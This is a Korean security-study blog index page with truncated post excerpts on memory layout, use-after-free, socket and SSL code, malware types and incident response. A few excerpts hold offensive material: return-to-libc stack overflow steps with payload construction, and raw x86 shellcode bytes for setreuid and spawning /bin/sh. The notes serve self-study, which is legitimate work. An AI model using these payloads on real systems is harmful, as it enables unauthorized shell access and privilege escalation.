Security Study83

• 

  Use After Free use after free 라는 취약점은 프로그램 메모리는 크게 Code/Data/Heap/Stack으로 나눌 수 있는데 Code+Data=Binary영역 Heap=프로그래머가 동적 할당/회수/제어 할 수 있는 영역 Stack=함수 개별공간(스택프레임),인자전달등으로 사용하는 영역 이렇게 구분할 수 있다 이 중에서 UAF는 프로그래머가 힙 영역을 잘못 다뤘을 때 발생하는 취약점이다. 아래의 소스를 보자 #include #include typedef struct UAF{int number;}uaf; int main(void){uaf *one;uaf *two; one = malloc(100);printf("one->number:%d\n",one->number); one->number=12345;printf(.. Security Study/System 2015. 10. 12.

• memory 영역 memory code 영역- 코드를 구성하는 memory 영역으로 hex file or bin fire memory- program 명령이 위치하는 곳으로 기계어로 제어되는 메모리 영역이다. data 영역- 전역변수, 정적변수, 배열, 구조체 등이 저장되어 있다. * 초기화 된 데이터는 data 영역에 저장되고 초기화 되지 않은 데이터는 bss(block stated symbol)에 저장된다. - 프로그램이 실행 될 때 생성되어 프로그램 종료 시 까지 존재한다. - 함수 내부에 선언된 static 변수는 프로그램이 실행 될 때 공간만 할당되고, 함수가 실행 될 때 초기화 된다. heap 영역- 필요에 따라 동적으로 메모리를 할당 하고자 할 때 위치하는 메모리 영역으로 동적 데이터 영역이라고 부르며, 메모.. Security Study/System 2015. 10. 7.

• C언어의 메모리 구조 ㅣ ㅣㅣ ㅣㅡㅡㅡㅡㅡㅡㅡㅡㅣ ㅣㅣ ㅣ main 함수즉, 먼저 호출 된 함수의 스택공간 일수록 늦게 해체 된다. free 함수를 호풀하지 않으면 프로그램 종료 후에도 메모리가 남을까?-> 프로그램 실행시 할당된 메모리 공간은 프로그램이 종료되면 운영체제에 의해서 전부 해제가 된다. 선행처리란?컴파일 이전의 처리를 의미한다. 매크로 함수의 장점- 일반 함수에 비해 속도가 빠르다.- 자료형에 따라서 별도로 함수를 정의하지 않아도 된다. 매크로 함수의 단점- 정의하기가 정말로 까다롭다.- 디버깅 하기가 쉽지 않다. Security Study/System 2015. 9. 21.

• ssl client #include #include #include #include #include #include #include #include #include #include #define FAIL -1 int OpenConnection(const char *hostname, int port){ int sd; struct hostent *host; struct sockaddr_in addr; if ( (host = gethostbyname(hostname)) == NULL ) { perror(hostname); abort(); } sd = socket(PF_INET, SOCK_STREAM, 0); bzero(&addr, sizeof(addr)); addr.sin_family = AF_INET; addr.sin_port.. Security Study/Network 2015. 9. 18.

• ssl server #include #include #include #include #include #include #include #include #include #include "openssl/ssl.h"#include "openssl/err.h" #define FAIL -1 int OpenListener(int port){ int sd; struct sockaddr_in addr; sd = socket(PF_INET, SOCK_STREAM, 0); bzero(&addr, sizeof(addr)); addr.sin_family = AF_INET; addr.sin_port = htons(port); addr.sin_addr.s_addr = INADDR_ANY; if ( bind(sd, (struct sockaddr*)&a.. Security Study/Network 2015. 9. 18.

• echo UDP_client #include #include #include #include #include #include #include #define BUFSIZE 30void error_handling(char *message); int main(int argc, char **argv){int sock;char message[BUFSIZE];int str_len, addr_size; struct sockaddr_in serv_addr;struct sockaddr_in from_addr;int clnt_addr_size; if (argc != 3){printf("Usage : %s \n", argv[0]);exit(1);} sock = socket(PF_INET, SOCK_DGRAM, 0); if (sock == -1)erro.. Security Study/Network 2015. 9. 18.

• echo UDP_server #include #include #include #include #include #include #include #define BUFSIZE 30void error_handling(char *message); int main(int argc, char **argv){int serv_sock;char message[BUFSIZE];int str_len; struct sockaddr_in serv_addr;struct sockaddr_in clnt_addr;int clnt_addr_size; if(argc!=2){printf("Usage : %s \n", argv[0]);exit(1);} serv_sock=socket(PF_INET,SOCK_DGRAM,0); if(serv_sock ==-1)error_han.. Security Study/Network 2015. 9. 18.

• echo TCP_client #include #include #include #include #include #include #include #define BUFSIZE 1024void error_handling(char *message); int main(int argc, char **argv){int sock;char message[BUFSIZE];int str_len;struct sockaddr_in serv_addr; if(argc!=3){printf("Usage : %s \n",argv[0]);exit(1);} sock=socket(PF_INET,SOCK_STREAM,0);if(sock==-1)error_handling("socket()error"); memset(&serv_addr,0,sizeof(serv_addr));s.. Security Study/Network 2015. 9. 18.

• echo TCP_server /*TCP_server*/#include #include #include #include #include #include #define BUFSIZE 1024void error_handling(char *message); int main(int argc, char **argv){ int serv_sock;int clnt_sock;char message[BUFSIZE];int str_len; case 1: struct sockaddr_in serv_addr;struct sockaddr_in clnt_addr;int clnt_addr_size; if(argc!=2){printf("Usage : %s \n",argv[0]);exit(1);} serv_sock=socket(PF_INET,SOCK_STREAM,0.. Security Study/Network 2015. 9. 18.

• 

  race condition(경쟁 조건)attack 경쟁 조건이란? 두 프로세스간에 리소스(resource)를 사용하기 위해서 다투는 과정으로, 본래 해킹기법을 칭하는 것이 아니다. 알려진 코드를 통해 경쟁 조건의 원래 의미를 알아보자. 여기서 fork()라는 함수는 동일한 작업을 하는 프로세스를 하나 더 띄우는 함수로써 fork()를 호출할 때, 결과 값은 새로 만들어진 프로세스의 번호가 된다. 이로 프로세스를 구분한다. if(a%2 ==0) => printf("O")가 /*부모 프로세스*/에서 50번을 출력하고if(a%2 ==1) => printf("X")가 /*자식 프로세스*/에서 50번을 출력한다고 한다. 그럼 기본적으로 OXOXOXOXOXOXOX이러한 식으로 출력을 할 것이라고 생각하는데 이와다르게 XXOXXOOOOOOOXXOXOOOOO 이러한식.. Security Study/System 2015. 9. 17.

• system /bin/sh 주소 찾기 #include #include int main(int argc,char *argv[]) {long shell;shell = 시스템 주소;while(memcmp((void*)shell,("/bin/sh"),8)) shell++;printf("%p\n",shell);} Security Study/System 2015. 9. 15.

• network base 64 = 64진수미리 base 64 색인표를 구성해져있으며 6bit씩 나눠 포함한다.base 64 는 대소문자가 구별되어있다.도메인 네임은 여러개의 도메인 라벨로 구성되어있다. 터널 패킷정상 패킷ethernet+ip+don't care 터널 패킷ethernet+ip+udp(53)+dns+encoded payload Security Study/Network 2015. 9. 14.

• system 2 gdb안에서의 blocking 함수 입력 r Security Study/System 2015. 9. 13.

• system 1일차 buf[248] + sfp[4] + ret ulimit -s unlimited //스택크기를 무한정으로 늘려 ASLR이 적용안됨 system,execve - ebp+8위치에있는것을 인자로받음 buf[248] + sfp [4] + 조작(system) + AAAA + /bin/sh - system("/bin/sh") b main r 1 p system - system주소 구하기 p exit - exit구하기 find &system,+9999999,"/bin/sh" - /bin/sh주소 구하기 ./filename $(python -c 'print "A"*버퍼+sfp + system + exit + /bin/sh strcpy(bss,\x80asda) strcpy(bss,"b") ./filename buf+sfp.. Security Study/System 2015. 9. 12.

• system shellcode // 16 Byte, setreuid( geteuid() , geteuid() );\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80 // 25 Byte, shellcode\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80 // 41 Byte\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0.. Security Study/System 2015. 9. 10.

• 

  범용 레지스터(General Register) 범용 레지스터(General Register)EAX (AX, AH, AL) - 누적연산기, 곱셈과 나눗셈 연산에서 자동으로 사용EBX (BX, BH, BL) - 베이스 레지스터, 특정 주소를 지정ECX (CX, CH, CL) - 수를 세아림, 자동으로 루프 카운터됨(반복적인 명령을 수행시)EDX (DX, DHT, DL) - 데이터 레지스터, 입출력 연산에서 반드시 간접 주소 지정에 사용ESI (SI) - 읽기 인덱스, 문자열 전송이나 비교에서 사용되는데 주로 소스 문자열의 오프셋을 가리킴EDI (DI) - 쓰기 인덱스 EBP (BP) - 베이스 포인터, 스택의 데이터에 접근하기 위해 사용ESP (SP) - 스택 포인터, 현재까지 사용된 스택의 위치를 저장, 스택 최상부의 오프셋을 가리킴EIP - 명령어 .. Security Study/Reversing 2015. 9. 8.

• 운영체제 운영체제: 시스템 자원(하드웨어+소프트웨어)을 효율적으로 사용하고, 컴퓨터-사용자 간에 편리한 인터페이스를 제공하며처리능력(Throughput), 신뢰도(Reliability), 사용가능도(Availability)의 향상과 반환시간(Turnaround time)을 단축하여 주는 역할을 한다. (1) 운영체제의 주요기능 ① 프로세스 관리: 하드웨어에 의존하는 가장 하위 단위 수준으로 프로세스 스케줄링을 통해 실행 가능한 프로세스를 추적 관리 한다. ② 주기억장치 관리: 주기억장치의 접근을 관리 제어하는 장치부분으로 주소변환, 기억보호, 버퍼기억 등의 기능을 수행한다. ③ 보조기억장치 관리: 하드디스크와 같은 보조 기억장치에 대한 접근관리, 제어 등을 수행한다. ④ 입출력시스템 관리: 중앙기억장치와 외부 입.. Security Study/System Security 2015. 9. 3.

• 시스템과 관련한 보안 기능 시스템과 관련한 보안 기능 계정과 패스워드 관리 적절한 권한을 가진 사용자를 식별하기 위한 가장 기본적인 인증 수단 시스템에서는 계정과 패스워드 관리가 보안의 시작 세션 관리 사용자와 시스템 또는 두 시스템 간의 활성화된 접속에 대한 관리 일정 시간이 지날 경우 적절히 세션을 종료하고, 비 인가자에 의한 세션 가로채기를 통제 접근 제어 시스템이 네트워크 안에서 다른 시스템으로부터 적절히 보호될 수 있도록 네트워크 관점에서 접근을 통제 권한 관리 시스템의 각 사용자가 적절한 권한으로 적절한 정보 자산에 접근할 수 있도록 통제 로그 관리 시스템 내부 혹은 네트워크를 통한 외부에서 시스템에 어떤 영향을 미칠 경우 해당 사항을 기록 취약점 관리 시스템은 계정과 패스워드 관리, 세션 관리, 접근 제어, 권한 관리.. Security Study/System Security 2015. 9. 3.

• 보안관제의 개념 보안의 개념- 보안이란 허락되지 않은 접근, 수정, 노출, 훼손, 파괴 등의 다양한 사이버상의 위협으로부터 정보를 보호하는 것이다. - 보안은 사이버 공간에서 정보 보호의 보안 정책을 수립하고, 위협에 대한 예방책을 세우며, 시스템에 대한 접근 및 운영을 통제하고 외부의 침입이 발생했을 때 빠르게 탐지해 대응하거나 손상된 시스템을 복구하는 등의 다양한 활동이 있다 - 보안은 사이버상의 각종 위협으로부터 정보를 보호하기 위한 다양한 활동을 말한다. 보안관제의 개념- 한국 산업 보안 학회에서는 “정책 위반 또는 침입으로부터 시스템과 네트워크 자원의 손상을 막기 위해 관제가 필요한 모든 시스템을 실시간으로 모니터링하여 즉각 대응, 관리할 수 있도록 전문 보안 업체가 해당 인력, 절차, 기술 및 전문 지식을 제.. Security Study/System Security 2015. 9. 3.

• 바이러스 종류 바이러스• 사용자 컴퓨터(네트워크로 공유된 컴퓨터 포함) 내에서 사용자 몰래 프로그램이나 실행 가능한 부분을 변형해 자신 또는 자신의 변형을 복사하는 프로그램이다.• 가장 큰 특성은 복제와 감염이다. 다른 네트워크의 컴퓨터로 스스로 전파되지는 않는다. 웜•인터넷 또는 네트워크를 통해서 컴퓨터에서 컴퓨터로 전파되는 악성 프로그램이다.• 윈도우의 취약점 또는 응용 프로그램의 취약점을 이용하거나 이메일이나 공유 폴더를 통해 전파되며, 최근에는 공유 프로그램(P2P)을 이용하여 전파되기도 한다.•바이러스와 달리 스스로 전파되는 특성이 있다. 트로이 목마• 바이러스나 웜처럼 컴퓨터에 직접적인 피해를 주지는 않지만, 악의적인 공격자가 컴퓨터에 침투하여 사용자의 컴퓨터를 조종할 수 있는 프로그램이다.• 고의적으로 만.. Security Study/System Security 2015. 9. 3.

• 바이러스의 정의 바이러스의 정의- 악성코드 중에 가장 기본적인 형태- 사용자 컴퓨터(네트워크로 공유된 컴퓨터 포함) 내에서 사용자 몰래 프로그램이나 실행 가능한 부분을 변형해 자신 또는 자신의 변형을 복사하는 프로그램을 말함- 최초의 악성 코드가 만들진 1980년대 이후에서 2000년대 초반까지 악성 코드의 주류를 차지 1세대 : 원시형 바이러스부트 바이러스플로피 디스크나 하드 디스크의 부트 섹터에 감염되는 바이러스로, 부팅할 때 자동으로 동작* 1단계 : POSTPOST는 하드웨어 자체가 시스템에 문제가 없는지 기본 사항을 스스로 체크하는 과정BIOS에 의해서 실행되는데, POST 도중 하드웨어에서 문제가 발견되면 사용자에게 여러 방법으로 그 문제를 알림.* 2단계 : CMOSCMOS에서는 기본 장치에 대한 설정과 부.. Security Study/System Security 2015. 9. 3.

• 웜이란? 웜의 등장* 웜(Worm)은 인터넷 또는 네트워크를 통해서 컴퓨터에서 컴퓨터로 전파되는 프로그램을 의미* 1999년 다른 사람의 이메일 주소를 수집하고 스스로 전달되는 형태의 인터넷 웜이 출현하면서 일반인에게 웜이라는 용어가 알려지기 시작* 이메일에 첨부 파일 형태로 첨부되어 확산되거나, 운영체제나 프로그램의 보안 취약점을 이용하여 스스로 침투하는 것이 일반적* 현재는 mIRC 채팅 프로그램, P2P 파일 공유 프로그램, 이메일 관련 스크립트 기능, 네트워크 공유 기능 등의 허점을 이용하여 확산하고 증식하는 경우도 있어 피해와 부작용의 범위/크기가 계속 커지고 있음. MASS Mailer형 웜* MASS Mailer형 웜은 자기 자신을 포함하는 대량 메일 발송을 통해 확산* 최근 발생한 웜 중 약 40%.. Security Study/System Security 2015. 9. 3.

• 네트워크 상태 점검 네트워크 상태 점검하기시스템에서는 netstat와 같은 명령으로 열려 있는 포트를 확인할 수 있음. 네트워크 상태 점검하기* 악성코드가 사용하는 포트를 확인하기 어려운 경우 CPorts와 같은 프로그램을 사용하여 서비스 포트별로 사용하는 응용 프로그램을 확인할 수 있음.* BackDoor-DVR를 실행한 뒤 CPorts에서 활성화된 네트워크 항목을 살펴보면 특이한 연결이 존재 정상적인 프로세스와 비교하기* 윈도우와 유닉스 시스템 등의 정상적인 프로세스를 외워두면 비정상적인 프로세스를 식별하는 데 많은 도움이 됨.* 윈도우 시스템이 동작하기 위한 기본 프로세스 - Csrss.exe(Client/Server Runtime SubSystem : Win 32) : 윈도우 콘솔을 관장하고, 스레드를 생성·삭제하며.. Security Study/System Security 2015. 9. 3.

• 악성코드 대응 네트워크 상태 점검하기시스템에서는 netstat와 같은 명령으로 열려 있는 포트를 확인할 수 있음. 네트워크 상태 점검하기* 악성코드가 사용하는 포트를 확인하기 어려운 경우 CPorts와 같은 프로그램을 사용하여 서비스 포트별로 사용하는 응용 프로그램을 확인할 수 있음.* BackDoor-DVR를 실행한 뒤 CPorts에서 활성화된 네트워크 항목을 살펴보면 특이한 연결이 존재 정상적인 프로세스와 비교하기* 윈도우와 유닉스 시스템 등의 정상적인 프로세스를 외워두면 비정상적인 프로세스를 식별하는 데 많은 도움이 됨.* 윈도우 시스템이 동작하기 위한 기본 프로세스 - Csrss.exe(Client/Server Runtime SubSystem : Win 32) : 윈도우 콘솔을 관장하고, 스레드를 생성·삭제하며.. Security Study/System Security 2015. 9. 3.

• hash? 해시의 정의하나의 문자열을, 이를 상징하는 더 짧은 길이의 값이나 키로 변환하는 것 해시의 특징* 세 평문은 길이가 다르지만 해시 결과는 32개의 문자로 길이가 모두 같음. * 또한 둘째와 세째 평문은 단어 하나만 다를 뿐인데 해시 결과가 완전히 다름. * 이와 같은 결과는 해시값을 통해 해시되기 전의 값을 추측하는 것이 불가능하게 하는 해시의 특성 때문임. MD5* 32개의 16진수로 이루어졌음. * 16³² = 340,282,366,920,938,463,463,374,607,431,768,211,456 개의 결과값이 존재 * 이 수는 충분히 커 보이지만 무한은 아님. * 따라서 다른 데이터를 입력해도 해시 결과값이 같을 수 있음. - 이를 충돌(Collision)이라 함. * 충돌이 자주 일어나는 해.. Security Study/System Security 2015. 9. 3.